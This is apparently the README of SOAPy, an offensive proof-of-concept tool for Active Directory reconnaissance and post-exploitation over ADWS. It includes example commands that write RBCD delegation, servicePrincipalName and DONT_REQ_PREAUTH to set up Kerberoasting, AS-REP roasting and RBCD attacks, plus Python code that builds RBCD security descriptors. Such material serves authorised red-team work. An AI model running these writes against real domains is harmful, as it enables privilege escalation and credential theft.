SOAPy is a Proof of Concept (PoC) tool for offensive interaction with Active Directory Web Services (ADWS) from Linux hosts. SOAPy includes custom Python implementations, not previously available, of the Microsoft protocols required to talk to the ADWS service, among them NNS (.NET NegotiateStream Protocol), NMF (.NET Message Framing Protocol), and NBFSE (.NET Binary Format: SOAP Extension).
SOAPy is primarily used to perform stealthy reconnaissance over ADWS, typically through a proxy into an internal Active Directory environment. It can also perform targeted post-exploitation over ADWS that abuses write access granted by an object's DACL: writing servicePrincipalName for targeted Kerberoasting, setting DONT_REQ_PREAUTH for targeted AS-REP Roasting, and writing msDs-AllowedToActOnBehalfOfOtherIdentity for Resource-Based Constrained Delegation (RBCD) attacks.
The protocol structure for interacting with ADWS is shown below:

The blog post detailing the original research, largely from an engineering perspective, can be found here.
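The outermost of the protocols named above is NMF: every byte ADWS exchanges on TCP 9389 is an MC-NMF record, and the NNS upgrade that authenticates the session is itself requested through an NMF record. The following encoder/decoder is an added example written for this page, not SOAPy's own code; the endpoint URI and the envelope bytes used in the usage are constructed samples, and the NNS handshake itself is out of scope here.

```python
"""
Encoder/decoder for the .NET Message Framing (MC-NMF) records that carry every
ADWS exchange on TCP 9389. Added example for this page, not SOAPy's own code;
the endpoint URI and envelope bytes below are constructed samples.
"""

# Record type bytes (MC-NMF 2.2.3).
VERSION, MODE, VIA, KNOWN_ENCODING = 0x00, 0x01, 0x02, 0x03
SIZED_ENVELOPE, END, FAULT = 0x06, 0x07, 0x08
UPGRADE_REQUEST, UPGRADE_RESPONSE, PREAMBLE_ACK, PREAMBLE_END = 0x09, 0x0A, 0x0B, 0x0C

MODE_DUPLEX = 0x02                           # request/response over one connection
ENCODING_BINARY_INBAND_DICT = 0x08           # NBFSE-encoded SOAP 1.2, in-band dictionary
NEGOTIATE_UPGRADE = "application/negotiate"  # asks the server to upgrade the stream to NNS

# Layout classes: fixed-size payload, varint-length-prefixed payload, or no payload.
FIXED_LEN = {VERSION: 2, MODE: 1, KNOWN_ENCODING: 1}
LENGTH_PREFIXED = {VIA, SIZED_ENVELOPE, FAULT, UPGRADE_REQUEST}
EMPTY = {END, UPGRADE_RESPONSE, PREAMBLE_ACK, PREAMBLE_END}


def encode_size(n: int) -> bytes:
    """MC-NMF size prefix: 7 bits per byte, least significant group first, 0x80 = more follows."""
    if n < 0:
        raise ValueError("size must be non-negative")
    out = bytearray()
    while True:
        group, n = n & 0x7F, n >> 7
        if n:
            out.append(group | 0x80)
        else:
            out.append(group)
            return bytes(out)


def decode_size(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode a size prefix at buf[pos]; returns (value, position after the prefix)."""
    value, shift = 0, 0
    for i in range(5):                      # the spec caps the prefix at 5 bytes
        if pos + i >= len(buf):
            raise ValueError("truncated size prefix")
        b = buf[pos + i]
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos + i + 1
        shift += 7
    raise ValueError("size prefix longer than 5 bytes")


def record(tag: int, payload: bytes = b"") -> bytes:
    """Serialise one record according to its layout class."""
    if tag in FIXED_LEN:
        if len(payload) != FIXED_LEN[tag]:
            raise ValueError("bad fixed-size payload")
        return bytes([tag]) + payload
    if tag in LENGTH_PREFIXED:
        return bytes([tag]) + encode_size(len(payload)) + payload
    if tag in EMPTY:
        return bytes([tag])
    raise ValueError(f"unknown record type 0x{tag:02x}")


def build_preamble(via: str) -> bytes:
    """Version 1.0, duplex mode, endpoint URI, binary encoding, then the NNS upgrade request.
    The server answers with an Upgrade Response record, the NNS handshake runs on the raw
    socket, and Preamble End / Preamble Ack / envelopes then travel inside NNS data frames."""
    return (
        record(VERSION, b"\x01\x00")
        + record(MODE, bytes([MODE_DUPLEX]))
        + record(VIA, via.encode("utf-8"))
        + record(KNOWN_ENCODING, bytes([ENCODING_BINARY_INBAND_DICT]))
        + record(UPGRADE_REQUEST, NEGOTIATE_UPGRADE.encode("utf-8"))
    )


def parse_records(buf: bytes) -> list[tuple[int, bytes]]:
    """Split a byte stream into (record_type, payload) pairs, rejecting truncation."""
    pos, out = 0, []
    while pos < len(buf):
        tag = buf[pos]
        pos += 1
        if tag in FIXED_LEN:
            n = FIXED_LEN[tag]
        elif tag in LENGTH_PREFIXED:
            n, pos = decode_size(buf, pos)
        elif tag in EMPTY:
            n = 0
        else:
            raise ValueError(f"unknown record type 0x{tag:02x} at offset {pos - 1}")
        payload = buf[pos:pos + n]
        if len(payload) != n:
            raise ValueError("truncated record")
        out.append((tag, payload))
        pos += n
    return out


if __name__ == "__main__":
    # Constructed sample endpoint (the host name is assumed); WS-Enumeration queries go here.
    via = "net.tcp://dc01.corp.local:9389/ActiveDirectoryWebServices/Windows/Enumeration"
    for tag, payload in parse_records(build_preamble(via)):
        print(f"0x{tag:02x} {payload!r}")
```

Once the NNS stream is up, each SOAP request is an NBFSE-encoded body wrapped in a Sized Envelope record (`record(SIZED_ENVELOPE, body)`), and the connection is closed with an End record; the parser above also accepts the Fault record a server sends when it rejects the preamble.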
@_logangoins
github.com/jlevere
usage: soapy [-h] [--debug] [--ts] [-H nthash] [--users] [--computers]
[--groups] [--constrained] [--unconstrained] [--spns]
[--asreproastable] [--admins] [--rbcds] [-q query]
[-f attr,attr,...] [-dn distinguishedname] [-p] [--rbcd source]
[--spn value] [--asrep] [--account account] [--remove]
[--addcomputer [MACHINE]] [--computer-pass pass] [--ou ou]
[--delete-computer MACHINE] [--disable-account MACHINE]
[--dns-add FQDN] [--dns-modify FQDN] [--dns-remove FQDN]
[--dns-tombstone FQDN] [--dns-resurrect FQDN] [--dns-ip IP]
[--ldapdelete] [--allow-multiple] [--ttl TTL] [--tcp]
connection
Perform AD reconnaissance and post-exploitation through ADWS from Linux
positional arguments:
connection domain/username[:password]@<targetName or address>
options:
-h, --help show this help message and exit
--debug Turn DEBUG output ON
--ts Adds timestamp to every logging output.
-H nthash, --hash nthash
Use an NT hash for authentication
Enumeration:
--users Enumerate user objects
--computers Enumerate computer objects
--groups Enumerate group objects
--constrained Enumerate objects with msds-allowedtodelegateto
--unconstrained Enumerate objects with TRUSTED_FOR_DELEGATION
--spns Enumerate accounts with servicePrincipalName set
--asreproastable Enumerate accounts with DONT_REQ_PREAUTH set
--admins Enumerate high privilege accounts
--rbcds Enumerate accounts with msDs-AllowedToActOnBehalfOfOtherIdentity set
-q query, --query query
Raw query to execute on the target
-f attr,attr,..., --filter attr,attr,...
Attributes to select, comma separated
-dn distinguishedname, --distinguishedname distinguishedname
The root object's distinguishedName for the query
-p, --parse Parse attributes to human readable format
Writing:
--rbcd source Write/remove RBCD (source computer)
--spn value Write servicePrincipalName value (use --remove to delete)
--asrep Write DONT_REQ_PREAUTH flag (asrep roastable)
--account account Account to perform operations on
--remove Remove attribute value based on operation
--addcomputer [MACHINE]
Create a computer account in AD (optional MACHINE name)
--computer-pass pass Password for the new computer account (optional).
--ou ou DN of the OU where to create the computer (optional).
--delete-computer MACHINE
Delete an existing computer account
--disable-account MACHINE
Disable a computer account (set AccountDisabled)
--dns-add FQDN Add A record (FQDN). Requires --dns-ip
--dns-modify FQDN Modify/replace A record (FQDN). Requires --dns-ip
--dns-remove FQDN Remove A record (FQDN). Requires --dns-ip unless --ldapdelete
--dns-tombstone FQDN Tombstone a dnsNode (replace with TS record + set dNSTombstoned=true)
--dns-resurrect FQDN Resurrect a tombstoned dnsNode
--dns-ip IP IP used with dns add/modify/remove
--ldapdelete Use delete on dnsNode object (when used with --dns-remove)
--allow-multiple Allow multiple A records when adding
--ttl TTL TTL for new A record (default 180)
--tcp Use DNS over TCP when fetching SOA serial
With pipx:
pipx install .
With poetry:
poetry install
Enumerate users using preset enumeration flags:
soapy <domain>/<user>:'<password>'@<ip> --users
Enumerate the sAMAccountName and objectSid of computer objects using a custom query with attribute filtering:
soapy <domain>/<user>:'<password>'@<ip> --query '(objectClass=computer)' --filter "samaccountname,objectsid"
Write msDs-AllowedToActOnBehalfOfOtherIdentity on DC01$, allowing MS01$ to delegate to (impersonate users against) DC01 in an RBCD attack:
soapy <domain>/<user>:'<password>'@<ip> --rbcd 'MS01$' --account 'DC01$'
Write the servicePrincipalName attribute on jdoe as part of a targeted Kerberoasting attack:
soapy <domain>/<user>:'<password>'@<ip> --spn test/spn --account jdoe
Write DONT_REQ_PREAUTH (0x400000) into jdoe's userAccountControl attribute, making the account AS-REP Roastable:
soapy <domain>/<user>:'<password>'@<ip> --asrep --account jdoe
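The --rbcd write above stores a binary security descriptor, and a descriptor built from scratch replaces whatever delegation was already configured on the target. The following builder and reader is an added example written for this page, not SOAPy's own code; it shows the self-relative SD layout, how to list the SIDs an existing value grants, and a read-merge-write helper so an engagement does not clobber existing entries. All SIDs are constructed samples; the owner/group SID and the 0xF01FF access mask are the conventional values used by public RBCD tooling, not something ADWS requires.

```python
"""
Build and read the security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity.
Added example for this page, not SOAPy's own code; all SIDs are constructed samples.
"""
import struct
from typing import Optional

SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACL_REVISION_DS = 0x04
ACCESS_ALLOWED_ACE_TYPE = 0x00
# CC DC LC SW RP WP DT LO CR SD RC WD WO: the mask public RBCD tooling conventionally writes
RBCD_ACE_MASK = 0x000F01FF
BUILTIN_ADMINS = "S-1-5-32-544"   # conventional owner/group placeholder


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID (revision, count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"malformed SID {sid!r}")
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, pos: int = 0) -> tuple[str, int]:
    """Inverse of sid_to_bytes; returns (sid_string, position after the SID)."""
    revision, count = buf[pos], buf[pos + 1]
    authority = int.from_bytes(buf[pos + 2:pos + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, pos + 8)
    text = "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])
    return text, pos + 8 + 4 * count


def build_rbcd_sd(allowed_sids: list[str]) -> bytes:
    """Self-relative SD: 20-byte header, owner SID, group SID, DACL with one allow ACE per SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, total size, access mask; then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_ACE_MASK) + sid_b
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    off_owner, off_group = 20, 20 + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + owner + dacl


def rbcd_allowed_sids(sd: bytes) -> list[str]:
    """List the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd, pos + 8)[0])
        pos += ace_size
    return sids


def add_rbcd_entry(existing_sd: Optional[bytes], new_sid: str) -> bytes:
    """Read-merge-write: a fresh descriptor would silently drop delegation already configured."""
    current = rbcd_allowed_sids(existing_sd) if existing_sd else []
    if new_sid in current:
        return existing_sd
    return build_rbcd_sd(current + [new_sid])


if __name__ == "__main__":
    ms01 = "S-1-5-21-1111-2222-3333-1105"   # constructed SID for MS01$
    sd = build_rbcd_sd([ms01])
    print(len(sd), "bytes;", rbcd_allowed_sids(sd))
```

Before writing, fetch the current attribute value and keep the raw bytes: restoring those bytes (or clearing the attribute if it was empty) is the cleanup step at the end of the engagement, and `rbcd_allowed_sids` lets you confirm the write took effect without trusting the tool's output.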